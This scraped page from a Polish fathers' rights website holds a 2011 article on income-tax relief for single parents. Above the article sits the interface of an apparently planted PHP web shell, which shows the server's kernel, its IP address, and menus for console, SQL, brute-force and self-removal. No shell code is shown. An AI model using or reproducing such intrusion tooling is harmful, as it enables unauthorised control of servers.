W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 19:13:22
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.150.98
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Ulgi w PIT dla samotnych rodziców
26.02.2011.
Przepisy podatkowe nie zawierają ani definicji samotnego wychowywania dziecka ani wychowywania. Dlatego te pojęcia należy rozumieć zgodnie z definicjami słownikowymi. I tak osoba samotnie wychowująca dziecko to osoba, która w określonej sytuacji, w określonym czasie zupełnie sama zajmuje się wychowywaniem dziecka. Z kolei wychowywać kogoś to zapewnić osobie niedorosłej osiągnięcie rozwoju fizycznego, psychicznego, zapewnić opiekę istocie niedorosłej oraz doprowadzić ją do samodzielności. Darmowy program do wypełnia PIT
Przepisy ustawy o PIT przewidują, że od osób o nieograniczonym obowiązku podatkowym w Polsce (w Polsce trzeba rozliczać się ze wszystkich światowych dochodów), samotnie wychowujących w roku podatkowym dzieci:

● małoletnie,

● bez względu na ich wiek, które zgodnie z odrębnymi przepisami otrzymywały zasiłek (dodatek) pielęgnacyjny lub rentę socjalną,

● do ukończenia 25. roku życia uczące się w szkołach, o których mowa w przepisach o systemie oświaty, przepisach o szkolnictwie wyższym lub w przepisach regulujących system oświatowy lub szkolnictwo wyższe obowiązujących w innym niż Polska państwie, jeżeli w roku podatkowym nie uzyskały dochodów podlegających opodatkowaniu według skali PIT lub dla kapitałów pieniężnych w łącznej wysokości przekraczającej kwotę stanowiącą iloraz kwoty zmniejszającej podatek oraz stawki podatku, określonych w pierwszym przedziale skali podatkowej, z wyjątkiem renty rodzinnej

podatek może być określony, na wniosek wyrażony w rocznym zeznaniu podatkowym, w podwójnej wysokości podatku obliczonego od połowy dochodów osoby samotnie wychowującej dzieci. Trzeba jednak wiedzieć, do sumy tych dochodów nie wlicza się dochodów (przychodów) opodatkowanych w sposób zryczałtowany na zasadach określonych w tej ustawie.

Samotny rodzic, który chce skorzystać z preferencyjnego rozliczenia PIT, musi jednak roczne zeznanie podatkowe złożyć w ustawowym terminie. Spóźnienie nawet jednodniowe pozbawi preferencji.

Osoby fizyczne roczne zeznanie podatkowe składają do 30 kwietnia następnego roku po roku, którego dotyczy rozliczenie podatkowe. Zatem PIT za 2010 rok będziemy składać do 30 kwietnia 2011 r., a zasadniczo do poniedziałku 2 maja 2011 r., bo 30 kwietnia w 2011 roku wypada w sobotę.

Podatnik powinien więc złożyć zeznanie najpóźniej 2 maja, jeśli chce skorzystać z preferencyjnego rozliczenia.
Darmowy program do wypełnia PIT
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy byłeś ofiarą przemocy domowej?
 
Które zamierzone zachowania partnerki wywołują w Tobie największe cierpienie?
 
z czym było ci się najtrudniej pogodzić po rozwodzie?
 
Czy organizacje "ojcowskie" powinny podjąć współpracę z sądownictwem?
 
Czy mężczyźni są w odwrocie?
 
Dlaczego nie płacisz alimentów?
 
Czy zdrada to koniec związku?
 
Czy masz utrudniane kontakty z dzieckiem?
 
Czy żłobek jest dobry dla dziecka?
 
Czy opieka wspólna po rozwodzie jest dobra dla wszystkich?
 
Czy należy zlikwidować sądy rodzinne?
 
Czy przekażesz nam swój 1%
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 3 gości
22.06.2018.